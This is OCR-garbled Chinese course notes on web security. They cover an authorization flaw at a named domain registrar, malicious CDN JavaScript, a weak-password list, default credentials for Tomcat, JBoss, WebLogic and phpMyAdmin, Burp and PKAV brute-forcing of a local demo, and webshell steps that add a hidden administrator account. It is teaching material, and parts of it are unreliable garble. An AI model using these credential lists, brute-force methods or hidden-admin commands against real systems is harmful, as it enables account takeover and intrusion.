参数 中 传 入 ， 又 没有 对 用 户 进 行 校 验 ， 导 致 可 以 越权 访问 其 它 域名 的 后 台 。 比 如 前 
段 时 间 的 商务 中 国 后 台 越权 访问 。 


首先 打开 自己 的 解析 管理 页 面 


漏洞 篇 第 三 方 风 险 







BERE 产品 中 心 > 域名 管理 > 域名 信息 管理 详情 
Sees 
oie eee sjsu top 

gov.cnitt 
BEA EGG: EE sir 

域名 所 有 者 ID : bif: ope Bae 
辖 入 记录 m 

Pome: dui 
域名 转 出 域名 所 有 者 ， M fit Gate 域名 转 稼 会 员 号 
sunm Whos: 未 开启 。 Whais 保 护 开 局 

TRE: 2017-1-27 
iei HHEH: 2018-1-27 FESTES 

eee DNSH: 正常 。 CNS 解析 管理 URH E 
whoistisim DNS 服务 器 : "msn.net — nsf.cnmsn.net 幅 改 DNS 服务 器 


. RASS ”注册 DNS 服务 器 ER FASI” 


域名 所 有 者 信息 ”域名 管理 人 信息 ”技术 联系 人 信息 6S AGE 


PHS mE 
域名 所 有 者 : 
s : 
a: Tad 





用 Burpsuite 抓 包 ， 发 现 “domainName” 和 参数 可 控 ， 修 改 为 其 它 站 点 (比如 商务 中 
自己 的 站 点 ) : 


ee [ee ee | Optone | 


| 4 Request to hltp-i^wuwnw bizen.com80 [180.76.193 8] 
Sie Pers [renters [1 


POST / product; domain! dnscesolve/index.do HTTIP/1.1 

Hosr: www.bizcn.com 

Comremr-Length: El 

Accepe: */* 

Origin: http://www.bizcn.com 

X-Bequested-Wich: XMLHrzpEequest 

Uaer-Agenr: HNozilla/5.0 iWimnmdows HT EL: Wowed) AppleWebFRic/S37.36 |EHTEL, like Gecko| Cheome/5E.0.2524.87 
Safari/5i7.3E 

Content-Type: application/z-www-form-urlencoded: charset=UTF-9 

Retececi http://www.bizcn.com/frame/init,.do 

Accept-Encoding: gzip, deflate 

Accept-Language: zh-CH,zh:qeso.8 

(Cookie: JSESSIOHIDSEECE3TA4A1515E6DZ704056542536AFABCAd-nirvana: LXB REFEBeswww.baidu.com: 

Hm Ive 074014055640 fbS8f2bBObÉd5cedat3TT-148 £02 OBZ 1, 140 £076312, 148 £8 753 £0; 

Hm lpvt Q73al41d55E4EfDSSTZ2bDObEd5Ceda37771238£DTE3El: CHZZDATA12Z53D0ZTIB8T972310875£5-14HEHl17TZDB-W7ClS3HEBT7T4421 
Connection: close 



























2x1 | 


domainMamesbizcn,comktags25f0dd20a1B8B4c8c8422 140558 L7dBB 
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即 可 查看 或 修改 商务 中 国 的 解析 记录 : 


O 产品 中 心 > 域名 管理 > 域名 列表 > DNS 解析 管理 
= | ZCI 
-= 当前 DNS 和 解析 条 数 上 限 : | n 增加 DNS 解析 上 限 
部 记录 ri MMX 记录 ME 记录 TXT NSid 
主机 名 i 记录 类 型 CRA 优先 级 


108 MK 108 TRES = 


IDC 


IDC 的 通俗 含义 是 主机 商 ， 也 就 是 卖 服务 器 的 商家 。 现 在 许多 IDC 同时 也 卖 域名 。 
IDC 的 漏洞 和 域名 商 类 似 ， 也 可 能 存在 任意 密码 重 置 或 者 越权 漏洞 。 另 外 ， 对 于 主 
机 来 说 ， 存 在 一 些 特 殊 的 漏洞 。 许 多 主机 商 在 主机 的 初始 设置 中 使 用 弱 冤 码 ， 比 
如 admin:123456 之 类 的 。 


外 源 JS 


现在 的 Web 应 用 或 多 或 少 会 使 用 一 些 外 源 的 JS， 但 这 里 面 可 能 存在 安全 隐患 。 如 
果 你 自己 编写 了 一 个 JS 文件 ， 提 供 了 一 些 功 能 ， 并 且 把 它 放 到 了 CDN 上 给 别人 

用 ， 你 就 可 以 修改 它 的 内 容 ， 所 有 使 用 它 的 站 点 都 会 受到 影响 。 比 如， 你 可 以 插入 
一 个 location.href Ww Rss A> RAIA XSS 平台 的 Payload 来 获取 
用 户 Cookie， 再 或 者 插入 一 个 对 资源 的 访问 来 DDoS 该 站 点 。 这 种 情况 下 ， 你 可 

以 让 这 些 站 点 来 玫 你 执行 任何 代码 。 


a. He 


CH 


建议 大 冢 建立 站 点 的 时 候 一 定 要 选 正 规 可 靠 的 域名 商 和 1IDC。 引 用 JS 文件 时 ， 如 


果 对 方 是 不 可 靠 的 站 点 ， 请 用 浏览 器 访问 它 ， 并 把 它 保存 下 来 ， 存 到 你 自己 的 
CDN 中 。 


KH 4s 4 PASM SUBE 85 OS e BS 185 


讲师 : ghOstkey 
整理 : 飞龙 
协议 : CC BY-NC-SA 4.0 


成 因 


弱 口 令 没 有 严格 和 准确 的 定义 ， 通 第 认为 容易 被 别人 ( 它们 有 可 能 4 你 很 了 解 ) 猜 
测 或 被 破解 工具 破解 的 口令 均 为 弱 口 令 。 弱 口令 指 的 是 仅 包 含 简 单数 字 和 字母 的 口 
邻 ， 例 如 "123"、"abc" 等 ， 因 为 这 样 的 口令 很 容易 被 别人 破解 。 


通过 爆破 工具 就 可 以 很 容易 破解 用 户 的 弱 口 令 。 


“rE 


Rights: WooYun-2014-89227 

mite: 中 国 石油 革 分 公司 旗下 多 个 加 油 沾 视频 监控 级 口 今 
相关 上 厂商: ”中国 石 视 天 然 气 集团 公司 

漏洞 作者 :， 路 人 甲 

提交 时 间 :， 2014-12-29 18:19 

AFRA: 2015-02-12 18:20 

漏洞 类 型 ， RESOUS 

危害 等 级 : 中 

自 评 Rank: 7 

WR. 厂商 已 经 确认 

WARF: http:7ywww,wooyun,org， 如 有 疑 | 由 或 需要 帮助 请 联系 help@wooyun.org 
Tagstsz, BOS PAM ASE (a 


分 享 漏洞 ， 园 分 到 Bale o 





中 石油 的 多 个 加 油 站 的 视频 监控 被 入 侵 ， 我 们 可 以 通过 它们 看 一 些 隐私 。 也 可 以 通 
过 它 把 监控 器 关 挥 ， 来 进行 一 些 非法 活动 。 


普通 型 弱 口 令 就 是 常见 的 密码 ， 比 如 ， 目 前 网 络 上 也 有 人 特地 整理 了 常用 的 弱 口 令 
(Top 100) 


123456 a123456 123456a 5201314 111111 woainii314 qq123456 123123 
000000 1qaz2wsx 1q2w3e4r 

qwe123 7758521 123qwe a123123 123456aa woaini520 woaini 100200 1 

314520 woaini123 123321 

q123456 123456789 123456789a 5211314 asdi123 a123456789 z123456 a 

sd123456 a5201314 aa123456 

zhang123 aptx4869 123123a 1q2w3e4r5bt 1qazxsw2 5201314a 1q2w3e ai 
ni1314 31415926 qiw2e3r4 

123456qq woaini521 1234qwer a111111 520520 iloveyou abci123 11011 

© 111111a 123456abc w123456 

7758258 123qweasd 159753 qweri1234 a000000 qq123123 zxc123 123654 
abc123456 123456q qq5201314 

12345678 000000a 456852 as123456 1314521 112233 521521 qazwsx123 
ZXC123456 abcd1234 asdasd 

666666 lovei1314 QAZ123 aaa123 qi1w2e3 aaaaaa a123321 123000 11111 
111 12qwaszx 5845201314 

s123456 nihaoi123 caonima123 zxcvbnm123 wangi123 159357 1A2B3C4D a 
sdasd123 584520 753951 147258 

1123581321 110120 qq1314520 


对 于 网 站 后 台 而 言 ， 一 般 为 : 


admin 
manager 
admin 123 
admin888 
admin666 


HAR s: mE € XH MA F Pl S) By: 
e 数据 库 (phpmyadmin ) 


o Ik : root 
o 密码 : root ^ root123 » 123456 
e tomcat 


o Jk : admin » tomcat ^ manager 

o 密码 : admin ^ tomcat ` admin123 ` 123456 ` manager 
e jboss 

o 账号 : admin ^» jboss ` manager 

o 密码 : admin ^ jboss ` manager ` 123456 
e weblogic 

o 账号 : weblogic ` admin ` manager 

o #44 : weblogic ` admin ` manager ` 123456 


条 件 型 


条 件 型 弱 口 令 就 是 和 用 户 信 息 相 关 的 密码 ， 比 如 生日 + 手机 号 、 姓 名 首 字 母 + 生日 、 
爱人 姓名 首 字母 + 生日 + 常用 字母 (520、1314 等 ) 。 
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我 们 可 以 使 用 这 个 猜 密 码 的 网 站 来 生成 条 件 弱 口令 字典 。 


Wem “首页 ”使 用 帮助 XFA ppm | 2 注册 


利用 人 性 的 弱点 精准 的 分 析 个 人 密码 


vem 


P 


伴侣 姓名 简 拼 


比如 我 们 知道 一 个 人 ， 他 的 信息 如 下 : 


名 一 

邮箱 : 412391882@aqq.com 
美文 名 : twowang 
手机 号 : 110 


那 我 们 就 可 以 在 这 个 网 站 上 输入 这 些 信 息 ， 然 后 点 击 下方 的 “提交 ”。 





猜 密码 Bu ”使 用 帮助 ”关于 我 们 





EN wangxiaoer 
"A 

















4 

J ^ 

) ^L 
n- 

P ^ 
EN 412391882 

1 ^ 
[eq 伴侣 姓名 简 拼 

n ^ 





Y 


然后 我 们 就 得 到 了 这 个 最 有 可 能 的 密码 。 


14 


RIED SU HRS 8A 


最 有 可 能 使 用 的 密码 


wangxiaoer110 wxellO twowangllO Twowang110 wxe520 

wxe5201314 wxel314 wxel123 wxel23456 wangxiaoer520 

wangxiaoer123 wangxiaoer1314 twowang520 twowang5201314 twowangl314 
twowang123 twowang123456 Twowang520 Twowang123 


查看 更 条 





点 击 “查看 更 多 "之 后 还 可 以 获取 更 多 弱 口 令 。 


实战 
比如 说 ， 我 们 使 用 这 样 一 段 代码 来 演示 弱 口 令 漏洞 ， 它 模拟 了 某 个 系统 的 后 台 。 


<?php 

function showForm() { ?> 

«form method="POST" action="./lesspass.php"> 
<input type="text" name="un" /> 
<input type="password" name="pw" /> 
«input type="submit" Value=" 和 登录 " /> 

«/form» «?php 


j 


$un = @$ POST['un']; 
$pw = Q$ POST['pw']; 
if($un == '' && $pw == 17) 
showForm( ) ; 
else if($un == ‘admin' && $pw == 'admin888') 
echo ' 登 录 成 功 '， 
else 1 
showForm( ); 
echo ' 有 登录 失败 '， 


第 一 行 到 第 七 行 组 成 了 一 个 HTTP 表单 。 我 们 可 以 看 到 ， 这 个 表单 使 用 POST 方 
法 向 这 个 页 面 自己 提交 信息 ， un 表单 域 对 应 PHP 的 un € €^ pw 表单 域 对 应 
PHP 的 pw XE ° 


第 九 行 和 第 十 行 从 HTTP 请 求 的 主体 中 取出 un 参数 和 pw 参数 。 


第 十 一 到 第 十 八 行 对 用 户 名 和 密码 参数 做 判断 ， 如 果 都 为 空 ， 那 么 我 们 认为 它 仅仅 
是 显示 页 面 的 请 求 ， 下 接 返回 。 如 果 un 为 admin ， 且 pw A admin888 ， 因 为 
这 是 我 们 预 设 的 正确 用 户 名 和 先 码 ， 所 以 显示 登陆 成 功 ， 否 则 显示 登录 失败 。 
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A, Sc ARAD BY JE] JP Fa SD MBS Be E a UU > 48. EE 473 FR 2 E] RC S] PR VL off Ede 
果 和 存在 弱 口 令 ， 还 是 能 破解 出 来 ， 原 理 一 致 。 


把 它 保存 为 lesspass.php ， 将 其 部 署 后 访 
l|] http://localhost/lesspass.php ° 


接 下 来 我 们 假装 不 知道 真实 密码 ， 开 始 尝试 。 对 于 管理 员 账 户 ， 用 户 名 一 般 
是 admin ^» 2545 T fe 
为 admin ^ admini23 ^ admin888 ^ 123456 ` 123abcadmin 等 等 。 


首先 输入 admin 和 admin ° XXX: 





MAN localhost/lesspass 
€ C | [5 localhost/lesspass.php 

应 用 @to-md = 实验 吧 D i 毒 秋 论 坛 Sea D Google 翻译 
| 登录 


| 


we =L Ae pér 
|: T kl iK. 3 a fl 4 


之 后 是 admin 和 admini23 ° et AM ° MEZI admin 和 admin888 °’ K 
3j o 


FAN localhost/lesspass.php x 





可 见 ， 爆 破 破解 的 原理 就 是 一 个 一 个 尝试 ， 破 解 效果 完 全 取决 于 你 所 使 用 的 字典 。 
如 果 密码 碰巧 在 你 的 字典 中 ， 就 一 定 能 成 功 。 


Burp Suite Js 


首先 我 们 需要 把 浏览 器 和 Burp 的 代理 配置 好 ， 打 开 Burp 的 拦截 模式 。 之 后 我 们 
在 lesspass.php 页 面 中 随便 输入 什么 东西 并 提交 ， 在 Burp 中 就 可 以 看 到 拦截 的 
封包 : 


漏洞 篇 弱 口 令 


d 
vo 
Ho 
3 

* 

M 24 
EX 
Nu 
cH 


burp intruder repeater window about 


repeater | sequencer | decoder | comparer | options 


requestto http./lacalhast80 [127.0.0.1] 


= ex | 


POST /lesspass.php HTTP/1.1 

Host: localhost 

Proxy—-Connection: keep-alive 

Content-Length: 20 

Cache-control: max-acge-t( 

Origin: http:// localhost 

Upgrade—-Insecure—-Requests: 1 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebEKit/537.36 (KHTML, like Gecko) 
Chrome/55.0.2924.87 Safari/537.36 

Content-Type: application/x-www-form-urlencoded 

Accept: text/html,application/ xhtml+xml,application/ xml; q=0.9, image/webp, */*;q=0.8 
Referer: http:// localhost, lesspass.php 

Accept-Encoding: gzip, deflate, Er 

Accept-Languadge: zh-CN, zh: g=0. 8 

Cookie: CHzzDbAàTAaàiQ00045245-1488557367-143837734277-3' 7071483 TPS 427 


un-admin&pw-adminiz3 


[FT Omatches 





为 了 爆破 密码 ， 我 们 需要 使 用 它 的 Intruder 功能 ， 右 键 弹 出 菜单 并 选择 "Send to 
Intruder" : 


(f 


burp intruder repeater window about 


intercept | options 


requestto http./lacalhast80 [127.0.0.1] 


= ex | 


POST /lesspass.php HTTP/1.1 

Host: localhost 

Proxy-cConnection: keep-alive 
Content-Length: 20 

Cache-Control: max-age=0 send to spider 
Origin: http:// localhost 
Upgrade-Insecure-Requests: a 
User-Agent: Mozilla/5.0 (wi  séendto intruder DleWebEit/537.36 (KHTML, like Gecko) 
Chrome/556.0.2924.87 Safari i 
Content-Type: application; 
Accept: text/html, applicat send to sequencer xml:cqz-0.9,image/webp,*/*:ng-0.8 
Referer: http://localhost/ 
Accept-Encoding: gzip, det 
hÀccept-Language: zh-CN, zh:} sendto decoder 


Cookie: CHzzbàATA100004359435 : LASS tte 
request in browser 


un-admin&pw-acdminiz3 engagement tools p 


change request method 


da an active scan 


send to repeater 


send to comparer 


change body encoding 
copy URL 

copy to file 

paste from file 


save item 


dont intercept requests 


do intercept 


= 


convert selection ü matches 





[d URI -encode as vou wne 


之 后 访问 Intruder 4s AR » Æ Position 子 标签 页 中 我 们 可 以 看 到 封包 。 
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burp intruder repeater window about 


i spider | scanner | intruder | repeater | sequencer | decoder | comparer | options 


ack 


3 payload positions 

POST /lesspass.php HTTP/1.1 

Host: localhost 

Proxy-Connection: keep-alive 

Content-Length: 20 

Cache-Control: max—age=0 

Origin: http:// localhost 

Upgrade-Insecure-Redquests: 1| 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOWE43) AppleWebFit/537.36 (EHTML, like 
Gecko) Chrome/56.0.2924.87 Safari/537.36 

Content-Type: application/x-www-form-urlencocded 

Accept: text/html,application/xhtml-c-xml,application/xml:cqez0.5,image/webp,*/*:cdqe-0.8 
Referer: http://localhost/lesspass.php 

Accept-Encoding: gzip, deflate, br 

Accept-Language: zh-CN, zh;q=0.8 

Cookie: CNZZDATA1000045945-81488557367-148377 


length: 635 


Al. 


um 


| | O matches 





我 们 需要 点 击 右边 的 Clear 按钮 把 所 有 标记 清除 掉 ， 由 于 我 们 需要 破解 密码 ， 我 
们 选中 密码 参数 值 点 击 Add 。 
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burp intruder repeater window about 


i spider | scanner | intruder | repeater | sequencer | decoder | comparer | options 


positions | payloads 
ack 


1 payload position 

POST /lesspass.php HTTP/1.1 at. add & 
Host: localhost 

Proxy-Connection: keep-alive 

Content-Length: 20 clear § 
Cache-Control: max—age=0 

Origin: http://localhost auto § 
Upgrade-Insecure-Redquests: 1| 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOWE43) AppleWebFit/537.36 (EHTML, like 

Gecko] Chrome/56.0.2924.87 Safari/537.36 refresh 
Content-Type: application/x-www-form-urlencocded 

Accept: text/html,application/xhtml-xml,application/xml:cqez0.5,image/webp,*/*:cqe-0.8 

Referer: http://localhost/lesspass.php 

Accept-Encoding: gzip, deflate, br 

Accept-Language: zh-CN, zh;q=0.8 

Cookie: LCNZZDATALIDUDULD45845-14HBH55731587—-143BH37734327—370C14H3 7734327 


length: 631 


un-admin&pw-Sacd 


wm 


Wes eu em | O matches 





ZR WRF] FH Payloads 标签 页 ， 点 击 中 间 的 load 按钮 ， 加 载 字 典 。 我 
们 选择 之 前 的 top100.txt ° 
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burp intruder repeater window about 


z 


number of payloads: — 3100 
number af requests: 100 


payload set 


: 
| 


a 


add from list ... 


load... 


paste 


delete clear 


select rule type 





REET 21 admin888 插入 进去 。 在 下 面 的 输入 框 中 输入 admin888 ， 并 点 击 
旁边 的 Add ° 
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burp intruder repeater window about 
2 
payloads options 


number of payloads: — 3100 
number af requests: 100 


payload set 


add 


add from list... 


load... 


i 
3 
É 
Led 
4 


paste 


E 


delete clear 


payload processing rules 


select rule type 





点 击 右 上 和 角 的 start Attack 来 开始 爆破 (ZMA 
是 Intruder -> Start Attack 菜单 栏 ) ， 我 们 会 看 到 结果 列表 。 
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repeater window about 











(tard actively scan defined insertion points 


send requestto repeater 
new tab 
delete tab 
rename tab 
save attack config 
load attack config 
copy attack config 
4 new tab behaviour 
automatic payload positions 
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attack save columns 


Filter: showing all items 


payload status | error time...) length comment 
2 = Lad zx 人 


13" 200 | ld 2 
5 quus Po J bd ld 294 — | —— 
[n wanasa —— poo — ||] |l] 294 | | 
一 














我 们 点 击 Length 表 头 ， 让 它 按照 长 度 来 排序 。 可 以 发 现 有 一 个 项 目的 长 度 与 其 它 
明显 不 同 ， 那 么 它 就 是 正确 的 结果 。 
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attack save columns 
Filter: showing all items 


request ee status error T | comment 


NUN TET M as puse 
< e — — po jae T e 
2 aza6 po ë |O Oa | — — 
[p hasa 0 |l] |l] E944 | — — — — 
4 Joi | [OO |  — -— — 
5 man la |O ope |  — — - 
[n — wanasa — 200 | L] | L] E94 | — — — — — 
7 — la | (O |l] | — —  — 


B bhaa | |O O | — 
9 foooooo |  |l]|l] eee | — - 
[in — aa2ws (000 | 器 | 器 lm | — - 
[t1 — Mower 0 |l] |l] E944 | — — — 
d2 waa la — | id | Ll] E94 | — — — — 


request | response 
"raw | params | headers 


POST /lesspass.php HTTP/1.1 
Host: localhost 
Proxy-Connection: keep-alive 
Content-Length: 20 
Cache-Control: max-—age=0 
Origin: http://localhost 
Upgrade-Insecure-Requests: 1 


| vmatches 





PKAV Fuzzer 


我 们 可 以 在 这 里 下 载 工具 


我 下 载 的 版 本 的 1.5.6， 我 就 可 以 双击 Pkav HTTP Fuzzer 1.5.6.exe 来 打开 
它 。 另 外 目录 下 还 有 一 份 使 用 手 

册 ， Pkav HTTP Fuzzer 使 用 手册 ver 1.0.pdf ， 大 家 可 以 参考 这 个 手册 。 
教程 只 会 讲 用 到 的 功能 。 


它 的 主 界面 是 这 样 的 : 
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目标 数据 重 放 设置 
分 析 地 址 : 重 放 模 式 ，| 正 序 异步 重 族 模 式 P 
| -] i 
请 求 包 : TARE: 1 v 当前 变 体 值 列表 v 
添加 | 
请 加 载 一 个 外 部 字典 Y 
SA 粘贴 
mls a= 
编辑 
HHP 
上 移 
TÉ 
请 选择 一 个 规则 类 型 v 添加 
清除 标记 你 ) 添加 给 证 码 标记 (Z) 自动 标记 (8) 。 清空 包 文 (9) e d 
变 体 设置 ”图片 型 验证 码 识别 ， 非 图 片 型 验证 码 识别 ” 重 放 选 项 “发包 器 TRU 
就 绪 ! 


左边 是 “请 求 包 ?输入 框 ， 我 们 需要 填写 整个 HTTP 封包 《就 是 Burp 中 
的 Proxy -> Intercept 选项 卡 中 的 内 容 ) ， 我 们 将 其 复制 过 来 。 然 后 我 们 选 
中 pw 位 置 的 admin ， 点 击 下 面 的 “添加 标记 ”: 


Hey Pl 55 Ww 4 BRAK 18 








目标 数据 Bina 
d ; 重 让 模式 ，| 正 序 异步 重 让 模式 B ^ 
|| RW 





请 求 包 : 变 体 赋值 ; 1 v ”当前 变 体 值 列表 v 


POST /lesspass.php HTTP/1.1 
Host: localhost 






Proxy-Connection: keep-alive 

Content-Length: 17 

Cache-Control: max-age-Ü 

Origin: http://localhost 

Upgrade-Insecure-Requests: 1 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537. 
36 (KHTML, like Gecko) Chrome/56.0. 2924.87 Safari/537. 36 
Content-Type: application/x-www-form-urlencoded 

Accept: text/html, application/xhtml+xml, application/xml ; q=0. 9, ima 
ge/webp, */*;q=0.8 添加 | ] 
Referer: http: //localhost/lesspass. php = 一 
Accept-Encoding: gzip, deflate, br 

Accept-Language: zh-CN, zh: q=0.8 请 加 载 一 个 外 部 字典 = 
Cookie: CNZZDATA1000045945=1 488557367-1483773427-%7C 1483773427 Sp $m 


=admingpw= § admin Ê 
un-adadmi w= 3 admin es. 清空 














请 选择 一 个 规则 类 型 v 添加 


清除 标记 你 ) 。 添加 验证 码 标记 (zZ) — 自动 标记 (8) Amm 
变 体 设置 ”图片 型 验证 码 识别 ” 非 图 片 型 验证 码 识别 SW aS TAHA 
ais 


我 们 再 来 看 看 右边 的 “ 重 放 设 置 *，“ 重 放 模 式 ? 和 “ 变 体 赋值 ?都 不 用 改动 ， 我 们 点 击 下 
方 的 “导入 ”按钮 ， 选 择 之 前 的 top100.txt ° 


ERI 
重 放 模 式 :| 正 序 异步 重 放 模 式 v 


seu: {i v] ERSE | 





























123456 ^ 
alz23456 

1234564 

5201314 

111111 

woainil3l4 

qqlz3456 

123123 


DQODODU = | [ : 
| qazZwsx "kn | ] 








qwelz3 


lqg2w3edr i EVI ET v 


7758521 SX [| a | 


123qwe 


: > || we | | 清空 | 





之 后 再 "添加 "按钮 右边 的 输入 框 中 输入 admin888 ， 然 后 点 击 “ 添 加 ”。 
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Bum 
Bist ERS Pees v| 


THRE: v MRM ww 








123456 
al23456 
1734564 
5201314 
111111 
woainil3l4 
231253456 


123123 

O00000 

lqazzwsx 
] q£zw3edr 
qwelz3 ! EE EE EE 
7758521 SA | 和 由 | 
123qwe E , = G i sid 


< > | HIP 1 I AT | 


添加 。 | |adnin888 


请 加 载 一 个 外 部 字典 。 ~ 













































































然后 我 们 点 击 下 方 的 “发包 器 "选项 卡 ， 在 新 的 界面 中 直接 点 "启动 ”: 


请 求 包 返回 包 页面 浏览 ”状态 信息 


验证 码 RSB ”错误 ”超时 
123456 200 
al23456 200 
1234564 200 
5201314 200 
111111 200 
woainil314 200 
qql23456 200 
123123 200 
000000 200 
lqaz2wsx 200 
lq2w3edr 200 
qwel23 200 
7158521 200 
123qwe 200 
23123123 200 
12345644 200 
woaini520 200 
woalni 200 
100200 200 
1314520 200 
woainil23 200 
123321 200 
0123456 200 
123456789 200 
1234567895 200 
5211314 200 
asd123 200 
3123456789 200 


179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 
179 


D3 D3 D3 D3 DY DY D3 D3 03 03 DY D3 DY 03 03 034 D3 DY 03 03 03 03 D3 03 03 03 131 03 
DS DY D3 D3 OS DY DY DY DS OS 03 03 03 D3 03 03 03 03 D3 DY 03 03 OS 03 03 03 034 DY 


me! 
变 体 设置 ”图片 型 验证 码 识别 ” 非 图 片 型 验证 码 识别 重 放 选 项 发 包 器 ”工具 说 明 


任务 已 完成 ! 


然后 我 们 点 击 “ 长 度 ” 表 头 ， 让 它 按照 长 度 排序 。 
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请 求 结 果 

RS 变 体 值 1 Su ish fae af KE 
1 = EE 了 -= 4 

1 123456 200 A = 179 
2 al23456 200 [E p 178 
3 1234564 200 th e 179 
K— mn -" E X m 
5 111111 200 = = 179 
6 woalnil3l4 200 a ts 179 
? qql23456 200 a a 179 
8 123123 200 [E es 178 
9 000000 200 tH 179 
10 lqaz2wsx 200 e 179 
11 lqzw3edr 200 e zs 179 
12 qwel23 200 e e 179 
13 7758521 200 th a 179 
14 123qwe 200 [E es 178 
15 3123123 200 tH = 179 
16 123456aa 200 a eh 179 
17 woainib2l 200 T = 179 
18 woainl 200 a t 179 
19 100200 200 a 179 
20 1314520 200 = x 178 
21 woainil23 200 th 1 79 
22 123321 200 e th 179 
23 q123456 200 T 到 179 
24 123456 768 200 a e 179 
25 1234567892 200 th a 179 
26 5211314 200 [E es 178 
21 asdl23 200 tH = 179 

我 们 可 以 看 到 ， 仅 当 密 码 为 admins88 时 长 度 为 6， 其它 都 是 其 它 


KJE 4A RAR o 


Burp Suite i& 7 
比如 这 段 代 码 ， 我 们 将 其 保存 为 info.php 


<?php 
$id = Q$ GET['id']; 
Saige = "Array ( 19029 3540S 
if(in_array($id, $arr, true)) 

echo "用 户 名 : $id 密码 : 123456": 
else 

echo "信息 出 错 "， 





数值 ， 那么 它 就 
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这 段 代码 模拟 了 用 户 信 息 的 查询 页 面 ， 一 共有 五 条 记录 。 我 们 可 以 访问 这 


个 页 面 ， 


并 使 用 Burp 来 拦截 。 像 之 前 一 样 ， 发 送 到 Intruder ， 然 后 清除 掉 所 有 标记 ， 只 


保留 ID 的 标记 





4 Burp Suite Professional vi.6.27 - licensed to Larry Lau 


Burp Intruder Repeater Window Help 





rawr verse | somuereer | pecoser | comer [tme | cto T aens | 











Configure the positions where payloads will be inserted into the base request. The attack type determines the way in which payloads are assigned to payload positions - 
see help for full details. 





Attack type: | Sniper [v | 


加 Payload Positions Start attack 





Upgrade-Insecure-Requests: i| 


GET /subject/info.php?id- HTTP/1.1 Add § 
Host: localhost | Adds | 


Cache-Control: max-age=0 一 一 
Accept: text/html,application/xhtmltxml,application/xml;q-0.9,image/webp,*/*;q-0.8 Clear § | 





Safari/537.36 


User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebEit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Auto & 





Cookie: CNZZDATAS5887291S9-cnzz eidt$3D31465907-14669729031-$76ntimet$3D1466979031 





Accept-Encoding: gzip, deflate, sdch Refresh 
Accept-Language: zh-CN,zh;q=0.8 | mm | 








1 payload position Lenath: 463 





Ef | omaes (5 eem 








由 于 是 纯 数字 ， 我 们 把 上 面 的 Payload Type 调 成 Numbers 。 下 面 ， 我 们 
把 From 3X7] 1 ° To HA 10 > Step X7] 1 ° 
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Burp Suite Professional v1.6.2T - licensed to Larry Lau 
Burp Intruder Repeater Window Help 


- 











(2) Payload Sets | Start attack | 


You can define one or more payload sets. The number of payload sets depends on the attack type defined in the Positions tab. various payload types are available for 
each payload set, and each payload type can be customized in different ways. 








Payload set: | 1 | v | Payload count: 10 
Payload type: | Numbers |* | Request count: 10 
(2) Payload Options [Numbers] 


This payload type generates numeric payloads within a given range and in a specified format. 


Number range 

Type: (9 Sequential ( ) Random 
From: 1 

To: 10 

Step: 1 

How many: 

Number format 

Base: (9 Decimal © Hex 
Min integer digits: 

Max integer digits: 

Min fraction digits: 

Max fraction digits: 














之 后 点 击 Start Attack 。 我 们 可 以 看 到 结果 ， 其 中 ID 1~5 的 长 度 都 是 224，6 
~ 10 都 是 211。 我 们 之 前 的 测试 中 ，2 是 有 效 的 ， 所 以 224 应 该 是 有 效 内 容 的 长 


RF o 
AX 
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% Burp Suite Professional vi.6.27 - licensed to Larry Lau 
Burp Intruder Repeater Window Help 


sre son e Dr rg mier 


— Intruder attack 3 zn H 
(2) Pay Attack Save Columns = 













Yor _[Resute | Target | postions | Payload | options | 








Fiter: Showing all tems (2 
" B 


Request A| Payload | Status | Error | Timeout | Length | Comment 








ü 200 QJ GJ 224 baseline request 
— 1 1 200 Q G 224 -一 一 一 
E 2 2 200 Q G 224 
ia) Pew. 3 200 g G 22 
This | 4 4 200 C) CJ 224 
5 5 200 OQ G 224 
Numk| | 6 6 200 o © 21 
Type 7 7 200 口 tJ 211 
8 8 200 口 E 21 
From | 9 9 200 GJ g 211 
10 10 200 Q GQ 211 
To: 
Step: 
How? 
Numk 
Base 








Max integer digits: 


Min fraction digits: 


Max fraction digits: 





camus 


多 字典 请 见 Kali 系统 的 /usr/share/wordlists 目录 。 


MY K 


e 新 手指 南 : DVWA-1.9 74 9 44422 Brute Force 

e 新 手指 南 : DVVWA-1.9 全 级 别 教程 之 Insecure CAPTCHA 
e Kali Linux 网 络 扫描 秘籍 第 七 草 Web 应 用 扫描 (一 ) 

e Kali Linux 网 络 扫 描 秘 籍 第 七 草 Web 应 用 扫描 (二) 

e Kali Linux 网 络 扫描 秘籍 第 七 草 Web 应 用 扫描 (三 ) 

e Burpsuite 神 器 常用 功能 使 用 方法 总 结 
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"Yl , | a sa 

Air Ilh ° 

V7 | AT < ghOstkey 

EL cu À 

Xx JU 。 -k 

YE LR 。 

】 ] is `~) e / \ 
INN ° ( ;( : BY- N C-S 4 0 
UJ rr 人 入。 


提 权 ， 顾 名 思 义 就 是 提高 自己 在 服务 器 中 的 权限 > 就 比如 在 Windows 中 你 本 身 登 
录 的 用 户 是 guest， 通 过 提 权 后 就 变 成 超级 管理 员 ， 拥 有 了 管理 Windows 的 所 有 权 
限 。 提 权 是 黑客 的 专业 名 词 ， 一 般 用 于 网 站 入 侵 和 系统 入 侵 。 本 讲义 所 讲 的 是 基于 
WebShell 的 菜刀 管理 下 提 权 。 


localhost 








基本 Dos 4 ^ HIF 


whoami : 查看 当前 用 户 名 ， 用 于 查看 权限 大 小 。 

ipconfig : 显示 当前 TCP/IP 配置 ， 用 于 查看 IP。 

net user : 查看 当前 系统 的 所 有 用 户 。 

net user < 用 户 名 > < 用 户 密 码 > /add : 创建 用 户 。 

net localgroup administrators < 用 户 名 > /add :将 用 户 加 
入 administrators 用 户 组 。 

远程 连接 默认 端口 : 3389 


下 面 拿 菜刀 中 的 Shell 演示 一 人 遍 这 几 个 命令 。 


首先 是 whoami ， 可 以 看 到 administrator ° EAE 


EHE ese mst-test con X B DOARST 


La 


le mat-test. com X 





然后 是 net user 





知道 这 些 用 户 之 后 ， 我 们 需要 创建 自己 的 用 户 mst 。 创 建 后 再 执行 net user ^ 
可 以 看 到 创建 成 功 : 





可 以 看 到 它 并 没有 显示 在 用 户 列表 中 ， 之 后 我 们 再 执行 net user mst$ 




